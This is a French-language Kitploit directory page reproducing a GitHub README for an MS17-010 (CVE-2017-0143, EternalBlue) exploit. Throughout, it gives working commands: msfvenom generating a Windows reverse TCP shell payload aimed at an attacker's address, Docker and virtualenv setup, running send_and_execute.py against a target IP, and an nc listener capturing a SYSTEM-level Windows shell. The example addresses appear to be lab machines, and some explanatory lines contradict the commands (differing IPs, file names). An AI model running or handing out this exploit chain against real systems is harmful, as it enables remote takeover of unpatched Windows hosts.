Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
MS17-010_CVE-2017-0143 — MS17-010_CVE-2017-0143 | Kitploit
Outils/GitHubGitHub/h3x0v3rl0rd/ms17-010_cve-2017-0143
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeTests d'IntrusionOutil d'Accès à Distance
GitHubh3x0v3rl0rd/ms17-010_cve-2017-0143

MS17-010_CVE-2017-0143

MS17-010_CVE-2017-0143

Voir le dépôt
4014il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

MS17-010

🖥️ -h3x0v3rl0rd- #️⃣ CVE-2017-0143

Docker

Utilisation de msfvenom pour générer un payload :

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1337 -f exe -o ms17-010.exe
  • -p windows/shell_reverse_tcp: Spécifie le payload (un shell inverse TCP pour Windows).
  • LHOST=10.10.14.4: L'adresse IP de l'attaquant (là où la cible se connectera en retour).
  • LPORT=443: Le port sur la machine de l'attaquant pour écouter la connexion.
  • -f exe: Génère le payload sous forme de fichier exécutable.
  • -a x86: Spécifie l'architecture (32 bits).
  • -o rev.exe: Enregistre le payload sous le nom rev.exe.

Mise en place d'un conteneur Docker :

  • Pourquoi utiliser Docker ?
    • Docker fournit un environnement cohérent et isolé pour exécuter l'exploit.
    • Il évite les problèmes de dépendances (par exemple, conflits de versions Python, bibliothèques manquantes).

Étapes pour configurer Docker :

root@kitploit:~
sudo apt-get install docker.io

Créer une structure de dossiers :

root@kitploit:~
mkdir exploit
cd exploit
touch Dockerfile
echo "impacket==0.9.23" > requirements.txt
  • Dockerfile: Contient les instructions pour construire le conteneur Docker.
  • requirements.txt: Liste les dépendances Python (par exemple, impacket).

Écrire le Dockerfile :

root@kitploit:~
FROM python:2.7-alpine
RUN apk --update --no-cache add \
    git \
    zlib-dev \
    musl-dev \
    libc-dev \
    gcc \
    libffi-dev \
    openssl-dev && \
    rm -rf /var/cache/apk/*

RUN mkdir -p /opt/exploit
COPY requirements.txt /opt/exploit
COPY ms17-010.exe /opt/exploit
WORKDIR /opt/exploit
RUN pip install -r requirements.txt
  • FROM python:2.7-alpine: Utilise une image Alpine Linux légère avec Python 2.7.
  • RUN apk --update --no-cache add: Installe les dépendances nécessaires (par exemple, git, gcc).
  • COPY rev.exe /opt/cattime: Copie l'exécutable du shell inverse (rev.exe) dans le conteneur.
  • RUN pip install -r requirements.txt: Installe les dépendances Python (par exemple, impacket).

Construire le conteneur Docker :

root@kitploit:~
sudo docker build -t exploit .

Exécuter le conteneur :

root@kitploit:~
sudo docker run -it exploit /bin/sh

Téléchargement et exécution de l'exploit :

root@kitploit:~
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
root@kitploit:~
cd MS17-010_CVE-2017-0143
root@kitploit:~
python send_and_execute.py 10.10.10.4 ../ms17-010.exe

Shell inverse :

root@kitploit:~
nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.4] 1035
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Anciennes méthodes

Méthode 1

root@kitploit:~
git clone https://github.com/h3x0v3rl0rd/MS17-010_CVE-2017-0143.git
cd MS17-010_CVE-2017-0143/
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=1337 -f exe -o ms17-010.exe

créez un listener nc

root@kitploit:~
nc -nlvp 1337

exploit

root@kitploit:~
python2.7 send_and_execute.py 10.129.163.162 ms17-010.exe

image

Si vous obtenez une erreur comme celle-ci, suivez ces étapes :

root@kitploit:~
cd MS17-010_CVE-2017-0143/
sudo python2.7 get-pip.py
pip2.7 install --upgrade setuptools
python2.7 -m pip install impacket

Maintenant, nous pouvons exécuter l'exploit : image

image

Méthode 2

Cet exploit est écrit en python2 et nécessite certaines bibliothèques comme impacket et pycrypto. Pour cela, un environnement virtuel doit être configuré, et c'est là que le programme virtualenv aide. Une fois l'environnement créé, vous pouvez l'activer à l'aide de l'utilitaire source. Ici, python2 est utilisé comme interpréteur car dans les dernières versions de Kali, python3 est défini comme interpréteur global et notre exploit est en python2.

Pourquoi utiliser un environnement virtuel ? Pour cela, vous pouvez consulter ceci : https://www.dabapps.com/blog/introduction-to-pip-and-virtualenv-python/

root@kitploit:~
virtualenv -p python2 venv
source venv/bin/activate
pip install impacket
pip install pycrypto

image

image

root@kitploit:~
python checker.py 10.10.10.4

image

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.12 LPORT=4445 -f exe > shell.exe 

image

root@kitploit:~
python send_and_execute.py 10.10.10.4 shell.exe 445 browser

image

root@kitploit:~
nc -nlvp 4445

image

Télécharger l’outil